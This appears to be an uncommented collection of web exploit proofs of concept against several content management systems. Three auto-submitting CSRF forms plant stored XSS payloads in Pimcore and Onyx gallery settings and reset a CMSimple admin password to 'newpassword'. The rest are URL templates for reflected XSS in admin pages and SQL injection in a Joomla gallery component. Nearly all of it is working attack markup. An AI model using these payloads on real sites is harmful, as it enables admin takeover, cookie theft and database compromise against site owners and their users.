---

<form action="http://host/admin/page/save/task/publish" method="post" name="main" >



<input type="hidden" name="data" value='{"headernote": {"data": "Powerful CMS"><script>alert(document.cookie)</script>",
"type": "textarea"}, "headline": {"data": "The truth about pimcore", "type": "input"},
"contentblock": {"data": ["1"], "type": "block"}, "blocktypecontentblock1": {"data":
null, "type": "select"}, "sublinecontentblock1": {"data": "Content management
ala pimcore", "type": "input"}, "contentcontentblock1": {"data": "<p>\n\tPimcore</p>\n\"><script>alert(document.cookie)</script>",
"type": "wysiwyg"}}' />

<input type="hidden" name="id" value="1440" />



</form>

<script>

document.main.submit();

</script>

---

---

<form action="http://host/" method="post" name="main" >



<input type="hidden" name="security_password" value="newpassword" />

<input type="hidden" name="security_type" value="page" />

<input type="hidden" name="site_title" value='CMSimple site' />

<input type="hidden" name="site_template" value="default" />

<input type="hidden" name="language_default" value="ru" />

<input type="hidden" name="meta_keywords" value="CMSimple, Content Management
System, php" />

<input type="hidden" name="meta_description" value="CMSimple is a content
management system" />

<input type="hidden" name="backup_numberoffiles" value="5" />

<input type="hidden" name="images_maxsize" value="150000" />

<input type="hidden" name="downloads_maxsize" value="1000000" />

<input type="hidden" name="mailform_email=" value="" />

<input type="hidden" name="editor_height" value="(screen.availHeight)-400" />

<input type="hidden" name="editor_external" value="" />

<input type="hidden" name="menu_color" value="000000" />

<input type="hidden" name="menu_highlightcolor" value="808080" />

<input type="hidden" name="menu_levels" value="3" />

<input type="hidden" name="menu_levelcatch" value="10" />

<input type="hidden" name="menu_sdoc" value="" />

<input type="hidden" name="menu_legal" value="CMSimple Legal Notices" />

<input type="hidden" name="uri_seperator" value=":" />

<input type="hidden" name="uri_length" value="200" />

<input type="hidden" name="xhtml_endtags" value="" />

<input type="hidden" name="xhtml_amp" value="true" />

<input type="hidden" name="plugins_folder" value="" />

<input type="hidden" name="functions_file" value="functions.php" />

<input type="hidden" name="scripting_regexp" value="\#CMSimple (.*?)\#" />

<input type="hidden" name="form" value="array" />

<input type="hidden" name="file" value="config" />

<input type="hidden" name="action" value="save" />



</form>

<script>

document.main.submit();

</script>

---

---

http://host/index.php?w=5&search_text=[XSS]

---

---

http://site/path/index.php?option=com_ongallery&task=ft&id=-1[SQLi]

---

---

http://[host]/admin/users.php?message=[XSS]
http://[host]/admin/category.php?message=[XSS]
http://[host]/admin/entry.php?message=[XSS]
http://[host]/admin/newentry.php?message=[XSS]
http://[host]/admin/comments.php?message=[XSS]
http://[host]/admin/newpage.php?message=[XSS]
http://[host]/admin/page.php?message=[XSS]
http://[host]/admin/settings.php?message=[XSS]
http://[host]/admin/changeclothes.php?message=[XSS]
http://[host]/admin/settings_theme.php?message=[XSS]
http://[host]/admin/themes.php?message=[XSS]
http://[host]/admin/plugins.php?message=[XSS]

---

---

<form action="http://host/admin/settings/update" method="post" name="main" >

<input type="hidden" name="setting[site_title]" value="My Onyx Gallery" />

<input type="hidden" name="setting[site_keywords]" value='Ruby on Rails Gallery"><script>alert(document.cookie)</script>' />

<input type="hidden" name="setting[site_description]" value='Onyx is an open
source free ruby on rails gallery"><script>alert(document.cookie)</script>' />

<input type="hidden" name="setting[welcome_title]" value="Welcome!" />

<input type="hidden" name="setting[welcome_message]" value="Welcome to my
gallery!" />

<input type="hidden" name="setting[uniform_width]" value="500" />

<input type="hidden" name="setting[uniform_height]" value="500" />

<input type="hidden" name="setting[thumbnail_width]" value="100" />

<input type="hidden" name="setting[thumbnail_height]" value="100" />

<input type="hidden" name="setting[dummy_watermark_enabled]" value="0" />

<input type="hidden" name="setting[tooltips_enabled]" value="1" />

<input type="hidden" name="setting[tooltip_width]" value="300" />

<input type="hidden" name="setting[maximum_uploadable_files]" value="10" />

<input type="hidden" name="commit" value="Update Settings" />


</form>

<script>

document.main.submit();

</script>

---